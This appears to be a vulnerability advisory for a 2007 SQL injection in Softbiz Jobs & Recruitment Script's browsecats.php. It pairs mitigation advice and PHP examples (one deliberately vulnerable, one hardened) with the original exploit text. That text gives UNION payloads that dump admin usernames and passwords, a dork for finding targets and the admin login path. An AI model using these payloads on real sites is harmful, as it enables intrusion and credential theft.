Vendor: Jobs & Recruitment Script
By: IRCRASH (Dr.Crash)
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Jobs & Recruitment Script
Patch Exists: NO
Year: 2007

Softbiz Jobs & Recruitment Script SQL INJECTION

The Softbiz Jobs & Recruitment Script is vulnerable to SQL injection. The 'cid' parameter of the 'browsecats.php' script is placed into a database query without validation, so an attacker can inject SQL through it and read data they should not have access to, such as usernames and passwords. The advisory text below shows a UNION-based query that retrieves the admin username and password from the database.

Mitigation:

To mitigate this vulnerability, validate user input (here, 'cid' should only ever be a numeric identifier) and use prepared statements or parameterized queries so that request values are passed to the database as data rather than as query text. Additionally, keeping the software up to date with security patches and regularly auditing the code for vulnerabilities is essential.
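The mitigation above in code, as an added example that is not Softbiz's code and not part of the advisory: a category lookup of the kind browsecats.php performs, written once with the 'cid' value spliced into the query (the pattern that makes the injection possible) and once with integer validation plus a bound parameter. The table and column names, the database credentials and the use of mysqli with mysqlnd (needed for get_result) are assumptions.

```php
<?php
// Added example (assumed schema, not the Softbiz code base): looking up a
// job category by the 'cid' request parameter, vulnerable and hardened.

// Vulnerable pattern: the raw request value is concatenated into the SQL
// text, so a value such as "999999 union select ..." is executed as SQL.
function browse_category_vulnerable(mysqli $db, string $cid): array
{
    $sql = "SELECT cat_id, cat_name, parent_id, job_count "
         . "FROM sb_categories WHERE cat_id = " . $cid;   // assumed table/columns
    $rows = [];
    if ($result = $db->query($sql)) {
        $rows = $result->fetch_all(MYSQLI_ASSOC);
    }
    return $rows;
}

// Hardened pattern: reject anything that is not a positive integer before
// the database is touched, then bind the value as a parameter so the server
// receives it as data and cannot interpret it as part of the query.
function browse_category_safe(mysqli $db, string $cid): array
{
    $cid_int = filter_var($cid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($cid_int === false) {
        // A non-numeric cid is never legitimate here; log it for the SOC and bail out.
        error_log('browsecats: rejected non-integer cid value: ' . substr($cid, 0, 64));
        return [];
    }

    $stmt = $db->prepare(
        "SELECT cat_id, cat_name, parent_id, job_count FROM sb_categories WHERE cat_id = ?"
    );
    $stmt->bind_param('i', $cid_int);   // 'i' = bind as integer
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);   // get_result needs mysqlnd
    $stmt->close();
    return $rows;
}

// Usage: the query-string value is handed over exactly as the web server
// received it; validation and binding happen inside browse_category_safe.
$db = new mysqli('localhost', 'jobs_user', 'assumed-password', 'jobs_db');   // assumed credentials
$db->set_charset('utf8mb4');
$cid  = $_GET['cid'] ?? '';
$rows = browse_category_safe($db, $cid);
foreach ($rows as $row) {
    echo htmlspecialchars($row['cat_name'], ENT_QUOTES, 'UTF-8'), "\n";
}
```

Validating the type first and binding second are complementary: the bound parameter is what defeats injection, while the integer check keeps garbage out of the query path entirely and gives the rejected value a log line that a detection rule can key on.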

Exploit-DB raw data:

#####################################################################################
####              Softbiz Jobs & Recruitment Script SQL INJECTION                ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#Script Download : http://www.softbizscripts.com/                                   #
#DORK: "Powered by SoftbizScripts" "ALL JOBS"                                       #
#                                                                                   #
#                                                                                   #
#                                                                                   #
#Injection Address : http://site.com/browsecats.php?cid=[sql code]                  #
#Sql code For see user name : 999999%20union/**/select/**/0,sb_admin_name,2,3/**/from/**/sbjbs_admin/*
#Sql code For see Password : 999999%20union/**/select/**/0,sb_pwd,2,3/**/from/**/sbjbs_admin/*
#                                                                                   #
#Admin panel for login : http://site.com/admin/index.php                            #
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################

# milw0rm.com [2007-10-08]